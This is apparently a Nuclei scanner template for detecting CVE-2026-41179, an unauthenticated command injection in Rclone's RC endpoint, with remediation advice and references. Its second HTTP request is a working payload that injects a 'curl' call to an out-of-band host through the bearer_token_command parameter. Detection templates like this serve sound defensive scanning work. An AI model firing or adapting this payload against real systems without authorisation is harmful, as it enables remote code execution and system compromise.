id: CVE-2026-41179 info: name: RClone RC - Command Injection author: theamanrawat severity: critical description: | Rclone >= 1.48.0 and < 1.73.5 contains an unauthenticated local command execution caused by unauthenticated access to the RC endpoint operations/fsinfo with attacker-controlled fs input, letting unauthenticated attackers execute local commands, exploit requires reachable RC deployment without global HTTP authentication. impact: | Unauthenticated attackers can execute local commands remotely, potentially leading to full system compromise. remediation: | Update to version 1.73.5 or later. reference: - https://github.com/rclone/rclone/security/advisories/GHSA-jfwf-28xr-xw6q - https://nvd.nist.gov/vuln/detail/CVE-2026-41179 classification: cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N cvss-score: 9.2 cve-id: CVE-2026-41179 epss-score: 0.05146 epss-percentile: 0.90041 cwe-id: CWE-78 metadata: verified: true max-request: 2 vendor: rclone product: rclone tags: cve,cve2026,rce,rclone,webdav,oast,unauth flow: http(1) && http(2) http: - raw: - | POST /rc/noop HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {} matchers: - type: dsl dsl: - 'contains(body, "{}")' - 'contains(content_type, "application/json")' - 'status_code == 200' condition: and internal: true - raw: - | POST /operations/fsinfo HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"fs":":webdav,url='http://{{interactsh-url}}/',vendor=other,bearer_token_command='curl http://{{interactsh-url}}/{{randstr}}':"} matchers: - type: dsl dsl: - 'contains(body, "Features")' - 'contains(interactsh_protocol, "http")' - 'status_code == 200' condition: and # digest: 4a0a0047304502202c2f17d496c0bd9b1eedff29413cb273aeb652689ee2cb9ac3ed1f8bb4479090022100f3fc5951421b16fede3565979bdcda9903446feb06278e7ec0f5134b3c5e12a0:922c64590222798bb761d5b6d8e72950